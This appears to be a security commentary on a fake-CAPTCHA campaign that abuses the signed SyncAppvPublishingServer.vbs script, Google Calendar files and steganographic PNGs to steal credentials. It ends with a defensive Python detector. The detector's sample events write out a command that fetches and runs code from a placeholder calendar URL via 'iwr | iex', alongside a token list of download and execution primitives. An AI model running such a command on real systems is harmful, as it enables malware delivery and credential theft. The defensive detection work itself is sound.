The technique shows how attackers can bypass traditional defenses by abusing trusted Microsoft binaries and benign cloud services, raising credential‑theft risk in enterprise Windows environments. Organizations must strengthen script control and user education to mitigate such living‑off‑the‑land attacks.
Fake CAPTCHA scams have evolved beyond simple visual puzzles, now coercing users into running system commands. By embedding malicious instructions within a familiar "I am not a robot" prompt, attackers exploit human curiosity and trust. The use of a Windows+R shortcut combined with a copy‑paste code sequence turns an ordinary user action into a silent infection vector, highlighting the growing sophistication of social engineering tactics that blend UI manipulation with legitimate operating‑system utilities.
The core of this campaign relies on a living‑off‑the‑land binary, SyncAppvPublishingServer.vbs, a signed Microsoft script normally used for App‑V management. Because the script is signed and trusted, many endpoint protection platforms overlook its activity. Further obfuscation comes from fetching command‑and‑control data from a public Google Calendar .ics file and hiding the actual payload inside innocuous PNG images through steganography. This multi‑layered approach, which leverages cloud services, legitimate scripts, and image files, creates a low‑profile delivery chain that can slip past sandbox analysis and traditional signature‑based detection.
For security teams, the incident underscores the need for stricter execution policies and application whitelisting, especially for LOLBins and script hosts. Monitoring for anomalous use of Windows+R, unexpected calendar subscriptions, or unusual image downloads can provide early indicators. Educating users to avoid copying commands from unverified sources remains a critical defense. As attackers continue to weaponize trusted tools and services, a blend of behavioral analytics, strict script controls, and user awareness will be essential to counter these covert credential‑stealing operations.
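The monitoring advice above can be turned into a concrete process-creation check. The following is an added example, not code from the original article or from any vendor: it runs over constructed Sysmon-style events (field names `Image`, `ParentImage`, `CommandLine` are assumed) and flags SyncAppvPublishingServer.vbs launches that come from an interactive explorer.exe parent (as a Win+R Run dialog would produce), chain extra commands into the script's argument, or carry download tokens such as a calendar `.ics` URL.

```python
import re

# Constructed process-creation records in Sysmon Event ID 1 style; they are
# sample data for this detection, not telemetry from the campaign above.
SAMPLE_EVENTS = [
    {   # interactive launch consistent with the Win+R lure described above
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs '
                       r'"n; iwr https://calendar.google.com/calendar/ical/EXAMPLE/public/basic.ics | iex"',
    },
    {   # constructed benign-looking run: scheduled-task parent, plain argument
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cscript.exe",
        "CommandLine": r'cscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n"',
    },
    {   # unrelated process, must not be flagged
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
]

SCRIPT_RE = re.compile(r"SyncAppvPublishingServer\.vbs\s*(.*)$", re.IGNORECASE)
# Tokens that have no place in a legitimate App-V sync argument.
SUSPECT_TOKENS = ("http", ".ics", "iex", "invoke-", "iwr", "downloadstring",
                  "frombase64", "-enc", "webclient")


def inspect_event(event):
    """Return the reasons this event looks like SyncAppvPublishingServer.vbs abuse ([] if none)."""
    match = SCRIPT_RE.search(event.get("CommandLine", ""))
    if not match:
        return []
    arg = match.group(1).strip().strip('"').lower()
    reasons = []
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("\\explorer.exe"):
        reasons.append("interactive launch from explorer.exe (Run dialog / Win+R)")
    # Assumption: the script forwards its argument to PowerShell, so ';' chains commands.
    if ";" in arg:
        reasons.append("argument chains extra commands with ';'")
    hits = [t for t in SUSPECT_TOKENS if t in arg]
    if hits:
        reasons.append("download/execution tokens in argument: " + ", ".join(hits))
    return reasons


def flag_suspicious(events):
    """Map each flagged event's command line to its reasons; benign events are omitted."""
    return {e["CommandLine"]: r for e in events if (r := inspect_event(e))}
```

Tune `SUSPECT_TOKENS` and the parent-process rule against your own App-V baseline before alerting on it; a scheduled-task parent with a bare argument is the shape a legitimate sync normally takes.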